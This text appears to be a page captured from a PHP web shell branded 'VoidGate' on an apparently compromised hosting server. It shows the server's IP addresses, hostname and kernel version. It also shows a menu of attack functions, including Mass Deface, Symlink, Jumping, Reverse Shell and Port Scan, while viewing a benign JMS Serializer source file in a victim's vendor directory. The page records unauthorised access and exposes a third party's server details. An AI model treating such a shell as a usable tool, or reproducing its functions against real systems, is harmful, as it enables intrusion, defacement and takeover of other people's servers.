ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
jms
/
serializer
/
src
/
JMS
/
Serializer
/
Expression
/
Viewing: ExpressionEvaluator.php
<?php namespace JMS\Serializer\Expression; use Symfony\Component\ExpressionLanguage\ExpressionLanguage; /** * @author Asmir Mustafic <goetas@gmail.com> */ class ExpressionEvaluator implements ExpressionEvaluatorInterface { /** * @var ExpressionLanguage */ private $expressionLanguage; /** * @var array */ private $context = array(); /** * @var array */ private $cache = array(); public function __construct(ExpressionLanguage $expressionLanguage, array $context = array(), array $cache = array()) { $this->expressionLanguage = $expressionLanguage; $this->context = $context; $this->cache = $cache; } /** * @param string $name * @param mixed $value */ public function setContextVariable($name, $value) { $this->context[$name] = $value; } /** * @param string $expression * @param array $data * @return mixed */ public function evaluate($expression, array $data = array()) { if (!\is_string($expression)) { return $expression; } $context = $data + $this->context; if (!array_key_exists($expression, $this->cache)) { $this->cache[$expression] = $this->expressionLanguage->parse($expression, array_keys($context)); } return $this->expressionLanguage->evaluate($this->cache[$expression], $context); } }
Coded With 💗 by
0x6ick